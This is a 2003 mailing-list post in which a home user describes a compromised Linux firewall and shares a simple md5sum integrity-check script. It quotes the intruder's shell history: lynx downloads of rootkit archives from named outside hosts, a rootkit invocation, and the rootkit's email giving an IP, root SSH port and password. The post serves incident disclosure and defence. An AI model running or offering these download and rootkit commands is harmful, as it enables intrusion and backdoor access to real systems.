System cracked, notes from similar incident a year ago

steve at horne.homelinux.net steve at horne.homelinux.net
Sun May 25 18:04:40 EDT 2003


                        BLU group members --

(This is sort of a long note but it may be of interest, & I don't post often...)

I was hacked about a year ago.

I wrote up the following shortly after the incident occurred.
Given the current discussion I thought it might be worth posting.
I'm still not sure how the initial breach occurred but suspect it was a
poor password.  I still have the hacker's .bash_history and (somewhere)
a disk image of the hacked system.

Since then (besides closing all unused ports, turning off telnet & other insecure services, ...)
I made a list of critical files in /etc, /sbin, ... and run md5sum  against them regularly
looking for changes.  This isn't automated, but easily could be.

Just for completeness, here are the commands --

To make the initial list:

===

#!/bin/sh
# Hash every regular file under the system directories that matter most;
# output is in the "hash  path" format that md5sum --check reads back.
find /sbin /bin /etc /usr/sbin /usr/bin /usr/local/bin \
     -type f -exec md5sum {} \; >  md5list1.txt
# -maxdepth 1 keeps only the top level of /usr/lib
find /usr/lib -maxdepth 1 -type f -exec md5sum {} \; >> md5list1.txt


=========

Then to test,

md5sum --check  md5list1.txt | grep -i failed > diff.txt

I've tried tripwire but found the above much easier to do & understand.
One detection over the past year -- my daughter (who has worked as a linux sysadmin)
added her boyfriend as a user.  That tripped the passwd and shadow files.

======================  Initial note, written up a year ago but never mailed ===========

My firewall was hacked last week.  I took it offline as soon as I suspected --
(Re-configured spare, locked it up, and hopefully secure now - )
I thought the group might be interested in a quick summary.

Bottom line -- the firewall was compromised (burned to a crisp)
but the fire seems to have stopped there.

The computer was running RH 5.1, with updated kernel 2.0.34
I'm still not sure what the exploit was. (Wasn't ftpd or imapd. Maybe lpr?)


I think the hacker may have been logged on when I broke the connection --
certainly he left a bunch of clues -- his .bash_history
lists several "interesting" sites and packages -- rootkit, etc
Quick summary of sites and packages -- (extracted
from his .bash_history)

lynx rollcage.net/x3.tar.gz
lynx rollcage.net/diverse/essh.tgz
lynx rollcage.net/diverse/dick.tgz
lynx rollcage.net/diverse/ftp.tar.gz
lynx rollcage.net/diverse/bec.tgz
lynx www.hanks.host.sk/srk.tgz
lynx www.sinrk.host.sk/srk.tgz

This last is a rootkit which when invoked like so
./srk rexnet 55789 1971

sent an email thus:
======
To: decoder at email.ro  (note, Mon May 26 09:22:44 EDT 2003: the IP is no longer valid)
Subject: SRK

  ssh 24.128.27.182 -l root -p 55789 # horne.blat.net password: rexnet psyBNC: 1971
======

This email didn't make it out of my system, came to me as root on my main computer.
I was at work but usually have a window open to home machine.
Looked weird; did a couple of quick checks, then called home,
had my daughter pull the network cables.

========  (End old writeup)

                                                                Steve


